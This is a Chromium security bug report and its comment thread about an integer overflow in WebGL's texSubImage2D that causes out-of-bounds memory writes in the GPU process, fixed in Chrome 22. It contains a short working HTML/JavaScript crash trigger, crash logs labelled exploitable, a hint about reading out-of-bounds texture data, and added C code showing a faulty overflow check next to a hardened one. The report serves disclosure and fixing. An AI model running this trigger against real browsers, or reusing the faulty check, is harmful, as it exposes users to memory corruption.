
Issue metadata

Status: Fixed
Closed: Dec 2012
OS: All
Pri: 1
Type: Bug-Security




Issue 145544: Security: integer overflow in gpu process with webgl

Reported by miau...@gmail.com, Aug 29 2012

Issue description

VULNERABILITY DETAILS
integer overflow in gpu process with webgl

This might be an ASan bug.

Chromium and Chrome say:
[ERROR:gles2_cmd_decoder.cc(5133)] .WebGLRenderingContext: GL ERROR :GL_INVALID_VALUE : glTexSubImage2D: bad dimensions.

VERSION
Chrome Version: dev
Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <script>
      // Allocate a 256x256 RGBA8 texture with no initial data.
      var gl = document.createElement("canvas").getContext("experimental-webgl");
      var texture = gl.createTexture();
      gl.bindTexture(gl.TEXTURE_2D, texture);
      gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0, gl.RGBA, gl.UNSIGNED_BYTE, null);
      // Sub-image update with yoffset = 0x7fffff00 (arguments: target, level, xoffset,
      // yoffset, width, height, format, type, pixels). yoffset + height overflows a
      // 32-bit int in the bounds math, and the driver's memcpy runs past the texture
      // storage (see the stacks below).
      gl.texSubImage2D(gl.TEXTURE_2D, 0, 0, 0x7fffff00, 256, 256, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(256 * 256 * 4));
    </script>
  </head>
</html>

Same problem with the large number in the x position.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: asan + gpu
Crash State: 

==2978== ERROR: AddressSanitizer unknown-crash on address 0x8000e033f080 at pc 0x55555f2a4310 bp 0x7fffffff7550 sp 0x7fffffff7308
READ of size 1 at 0x8000e033f080 thread T0
    #0 0x55555f2a430f in __interceptor_memcpy ??:0
    #1 0x7fffe95934c6 in ?? ??:0
==2978== AddressSanitizer CHECK failed: /usr/local/google/chrome/src/third_party/llvm/projects/compiler-rt/lib/asan/asan_report.cc:136 "((0 && "Address is not in memory and not in shadow?")) != (0)" (0x0, 0x0)
    #0 0x55555f2a923e in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) ??:0
    #1 0x55555f2a83a9 in __asan::DescribeAddressIfShadow(unsigned long) ??:0
 
Attachments: overflow.html (443 bytes), overflow.txt (1.3 KB)

Comment 1 by tsepez@chromium.org, Aug 30 2012

Cc: zmo@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Feature-GPU-WebGL OS-All Mstone-22 SecSeverity-High SecImpacts-Stable SecImpacts-Beta
Owner: kbr@chromium.org

Comment 2 by scarybea...@gmail.com, Aug 30 2012

Cc: kcc@chromium.org
@kcc: ASAN bug or real?

Comment 3 by kcc@chromium.org, Aug 31 2012

Cc: glider@chromium.org
All I see now is a null deref, and ASan is unable to unwind through it.

Comment 4 by glider@chromium.org, Aug 31 2012

Status: Assigned
The NULL deref is reproducible for me under Chrome built with just Clang (without ASan): https://crash.corp.google.com/reportdetail?reportid=b482b3a3089c9c91

Here's the crashing thread stack:

0x7f12a3cc6fc1  [libc-2.11.1.so + 0x00086fc1]
0x7f129d6a06f5  [libnvidia-glcore.so.295.71 + 0x010266f5]
0x7f129d6aa7d9  [libnvidia-glcore.so.295.71 + 0x010307d9]
0x7f129d6a069f  [libnvidia-glcore.so.295.71 + 0x0102669f]
0x7f129d7afbcd  [libnvidia-glcore.so.295.71 + 0x01135bcd]
0x7f129d7a4bfa  [libnvidia-glcore.so.295.71 + 0x0112abfa]
0x7f1299db60f7  [.com.google.Chrome.7YWdZV (deleted) + 0x000100f7]
0x7f1299db60f7  [.com.google.Chrome.7YWdZV (deleted) + 0x000100f7]
0x7f1299db60f7  [.com.google.Chrome.7YWdZV (deleted) + 0x000100f7]

Comment 5 by zmo@chromium.org, Aug 31 2012

Cc: -zmo@chromium.org vangelis@chromium.org kbr@chromium.org gman@chromium.org
Owner: zmo@chromium.org
Ken is on vacation.  I'll take a look.

Comment 6 by scarybea...@gmail.com, Sep 6 2012

Labels: ReleaseBlock-Stable

Comment 7 by zmo@chromium.org, Sep 6 2012

Status: Started

Comment 8 by miau...@gmail.com, Sep 6 2012

Works on Intel:

==7710== ERROR: AddressSanitizer crashed on unknown address 0x7fffe31a5000 (pc 0x7fffe9a5afc2 sp 0x7fffffff74a0 bp 0x000000000400 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fffe9a5afc2 (/usr/lib/x86_64-linux-gnu/dri/libdricore.so+0xdffc2)
Stats: 37M malloced (35M for red zones) by 50451 calls

Comment 9 by gman@chromium.org, Sep 7 2012

Owner: gman@chromium.org
This was a bug in the overflow math code

There's a CL here that fixes it
http://codereview.chromium.org/10916165/

Comment 11 by infe...@chromium.org, Sep 7 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
miaubiz, can you try on trunk to see if it fixes it for you?

Comment 12 by miau...@gmail.com, Sep 8 2012

Fixed in 155560 for me.

Comment 13 by scarybea...@gmail.com, Sep 8 2012

Labels: reward-topanel
@miaubiz: thanks. I'll get it merged for the upcoming Chrome 22 release.

We actually tracked this to a legitimate modern compiler optimization on tricky code. I wonder if other release compiles are affected? Win, Linux, ... if so, might be fun to try and read the OOB texture values via JS ;-) Rewards panel now loves that sort of thing.

Comment 14 by miau...@gmail.com, Sep 10 2012

@scarybeasts: can you please elaborate on what you mean by the legitimate modern compiler optimization, and on how to proceed with checking more stuff?

Comment 15 by scarybea...@gmail.com, Sep 10 2012

@miaubiz: the problem is "signed arithmetic overflow behaviour" -- which is specifically undefined in the C standard. We had some code relying on it. Modern compilers will perform optimizations that break such code.

So, the clang / ASAN compiler you used to find this bug definitely has the optimization!

But what about Windows / MSVC? Does your test case reproduce on Windows?
How about a standard Linux build? That is compiled with GCC.

I think it'd be interesting, that's all :D
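
The pattern scarybeasts describes in c#15, run against the numbers from the repro case in c#0, as an added worked example. This is my code, not Chromium's and not the CL linked in c#9; the function names and the exact shape of the faulty check are assumptions, only the texture geometry and the 0x7fffff00 offset come from the report.

```c
#include <stdint.h>
#include <stdio.h>

/* Geometry taken from the reporter's test case: a 256x256 RGBA8 texture
 * (4 bytes per texel) updated with a 256x256 sub-image whose yoffset is
 * 0x7fffff00 (and, per c#0, the same value as xoffset also crashes). */
#define TEX_W 256
#define TEX_H 256
#define BPP   4

/* Pattern A (hypothetical reconstruction of the shape being discussed,
 * not Chromium's code): form offset + size in a signed int and try to
 * detect the wrap afterwards.  Signed overflow is undefined behaviour, so
 * clang and gcc may legally fold "end < offset" to "size < 0" and delete
 * the wrap test; for overflowing inputs the return value is then whatever
 * the optimiser produced, which is the bug class in this issue. */
int range_ok_wrap_assumed(int offset, int size, int tex_size)
{
    int end = offset + size;          /* UB once offset + size > INT_MAX */
    if (end < offset)                 /* intended to catch the wrap */
        return 0;
    return offset >= 0 && size >= 0 && end <= tex_size;
}

/* Pattern B (hardened): reject negatives, then compare without ever
 * computing offset + size.  With 0 <= offset <= tex_size the subtraction
 * tex_size - offset cannot overflow, so no UB is reachable. */
int range_ok(int offset, int size, int tex_size)
{
    if (offset < 0 || size < 0 || tex_size < 0)
        return 0;
    if (offset > tex_size)
        return 0;
    return size <= tex_size - offset;
}

/* The 2-D check a glTexSubImage2D validator needs: both axes. */
int subimage_ok(int xoffset, int yoffset, int width, int height)
{
    return range_ok(xoffset, width, TEX_W) && range_ok(yoffset, height, TEX_H);
}

/* Byte distance from the texture base to the first texel of the
 * sub-image, computed in 64 bits so that this arithmetic itself cannot
 * wrap.  It shows how far a driver memcpy lands once the check is gone:
 * the whole texture is only TEX_W * TEX_H * BPP = 256 KiB, and the
 * reporter's yoffset puts the destination about 2 TiB past it. */
uint64_t dest_offset_bytes(int xoffset, int yoffset)
{
    return ((uint64_t)yoffset * TEX_W + (uint64_t)xoffset) * BPP;
}

int main(void)
{
    struct { int x, y, w, h; } cases[] = {
        {0, 0, 256, 256},           /* whole texture: valid */
        {0, 0x7fffff00, 256, 256},  /* reporter's case (yoffset) */
        {0x7fffff00, 0, 256, 256},  /* same value as xoffset */
        {128, 128, 129, 128},       /* one texel too wide, no overflow */
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        printf("x=%#x y=%#x w=%d h=%d  hardened=%d  dest=%llu bytes\n",
               (unsigned)cases[i].x, (unsigned)cases[i].y, cases[i].w, cases[i].h,
               subimage_ok(cases[i].x, cases[i].y, cases[i].w, cases[i].h),
               (unsigned long long)dest_offset_bytes(cases[i].x, cases[i].y));
    }
    return 0;
}
```

Build Pattern A at -O2 and inspect the generated code for the `end < offset` test; clang's `-fsanitize=signed-integer-overflow` (UBSan) reports the wrap at run time for the 0x7fffff00 cases. Pattern B needs neither, because it never evaluates an expression that can overflow, which is the only portable way to make such a check hold regardless of compiler.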

Comment 16 by miau...@gmail.com, Sep 10 2012

I see.

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --gpu-launcher="env CW_CURRENT_CASE=scarybeasts $HOME/crashwrangler/exc_handler" --incognito --disable-breakpad scarybeasts.html


Crashed thread log:
CrGpuMain  Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib             	0x951baa37 memmove$VARIANT$sse42 + 218
1   libGLImage.dylib              	0x98933e64 glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 106
2   libGLImage.dylib              	0x98932823 glgProcessPixelsWithProcessor + 991
3   GLEngine                      	0x05f1d1aa gleTextureImagePut + 1167
4   GLEngine                      	0x05dc56fe glTexSubImage2D_Exec + 1882
5   libGL.dylib                   	0x92068546 glTexSubImage2D + 87
6   com.google.Chrome.framework   	0x02679fe8 ChromeMain + 39718232

---
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movdqa	%xmm0,(%edi,%edx):instruction_address=0x00000000951baa37:access_type=write:access_address=0x0000000007c0f000:

Comment 17 by miau...@gmail.com, Sep 10 2012

Meanwhile on Safari; requires manually setting 'Enable WebGL' though.

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib                   0x00007fff89385aa7 memmove$VARIANT$sse42 + 159
1   libGLImage.dylib                    0x00007fff86dc2acc glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 129
2   libGLImage.dylib                    0x00007fff86dc1644 glgProcessPixelsWithProcessor + 885
3   GLEngine                            0x0000000150e6cf6d gleTextureImagePut + 1264
4   GLEngine                            0x0000000150d1bb7b glTexSubImage2D_Exec + 1720
5   libGL.dylib                         0x00007fff8e05d28a glTexSubImage2D + 77
6   com.apple.WebCore                   0x00007fff8506c583 WebCore::GraphicsContext3D::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, void const*) + 83
7   com.apple.WebCore                   0x00007fff858d83ea WebCore::WebGLRenderingContext::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, WTF::ArrayBufferView*, int&) + 426
8   com.apple.WebCore                   0x00007fff850599b2 WebCore::jsWebGLRenderingContextPrototypeFunctionTexSubImage2D(JSC::ExecState*) + 1602



Path:            /System/Library/PrivateFrameworks/WebKit2.framework/WebProcess.app/Contents/MacOS/WebProcess
Version:         8536 (8536.25)
OS Version:      Mac OS X 10.8.1 (12B19)

Comment 18 by scarybea...@gmail.com, Sep 10 2012

Nice. GCC on Mac clearly affected.

Comment 19 by kcc@chromium.org, Sep 10 2012

I thought we use Clang on Mac, not GCC.

Comment 20 by scarybea...@gmail.com, Sep 10 2012

Oh, possibly my bad. Xcode switched to Clang?

Comment 21 by kcc@chromium.org, Sep 11 2012

>> Xcode switched to Clang?
Yep. (Long ago, I think)

Comment 22 by miau...@gmail.com, Sep 11 2012

Yeah. Apple ditched GCC a while back.

OS X has no GPU sandbox, right?

Comment 23 by scarybea...@gmail.com, Sep 11 2012

I think it does: content/common/sandbox_mac.mm

Comment 24 by scarybea...@gmail.com, Sep 17 2012

Labels: -Merge-Approved Merge-Merged

Comment 26 by scarybea...@gmail.com, Sep 25 2012

Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: nice job for starting fuzzing on your Mac. Seems to be a new source of revenue :D
$1000

Comment 27 by miau...@gmail.com, Sep 27 2012

@scarybeasts: It says [Mac only] [$1000] [145544] High CVE-2012-2896: Integer overflow in WebGL. Credit to miaubiz.

This was on Linux too (including Intel); see c#0 and c#8.

Comment 28 by scarybea...@gmail.com, Sep 27 2012

I think you were seeing it on Linux because ASAN builds use the Clang compiler.
Production Linux builds use GCC. GCC has been known to apply the same optimization but I don't see any crash logs against production builds? So hard to say :)

Comment 29 by scarybea...@gmail.com, Oct 11 2012

Labels: -reward-unpaid

Comment 30 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 31 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -Feature-GPU-WebGL -Mstone-22 -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta Cr-Content Cr-Internals-GPU-WebGL Security-Impact-Stable Security-Impact-Beta M-22 Security-Severity-High Type-Bug-Security

Comment 32 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify

Comment 33 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 34 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 35 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 36 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 37 by bugdroid1@chromium.org, Apr 10 2013

Project Member
Labels: -Cr-Internals-GPU-WebGL Cr-Blink-WebGL

Comment 38 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 39 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 40 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 41 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic
